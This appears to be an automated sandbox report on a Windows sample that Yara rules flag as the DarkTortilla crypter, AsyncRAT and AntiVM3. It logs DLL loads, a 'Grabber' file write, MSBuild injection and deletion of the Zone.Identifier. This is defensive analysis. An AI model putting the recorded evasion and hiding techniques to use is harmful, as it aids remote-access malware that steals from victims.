Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File written: C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Kh7W85ONS7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Kh7W85ONS7.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.6.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.6.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.6.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.6.dr

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3cee410.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.5d00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.5d00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3cee410.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2128978665.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003CEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2120819083.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR

.NET source code contains method to dynamically call methods (often used by packers)

Source: Kh7W85ONS7.exe, Xy3k.cs

.Net Code: NewLateBinding.LateCall(objectValue, (Type)null, "Invoke", obj5, (string[])null, (Type[])null, obj6, true)

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_07522301 push FFFFFF8Bh; retf	0_2_075222EB
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_07523F06 push FFFFFFE9h; retn 0001h	0_2_07523F08
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_07524005 push FFFFFFE9h; ret	0_2_07524007
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075E31C2 push edi; iretd	0_2_075E31C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_02D7F134 push 8402EBC3h; ret	6_2_02D7F139
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05ADE590 push es; ret	6_2_05ADE5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05ADEC58 push esp; iretd	6_2_05ADEC59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05AD0B18 push E402EBD2h; ret	6_2_05AD0B1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05AD179C push eax; iretd	6_2_05AD179D

Source: Kh7W85ONS7.exe

Static PE information: section name: .text entropy: 6.934920648191149

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

File opened: C:\Users\user\Desktop\Kh7W85ONS7.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR
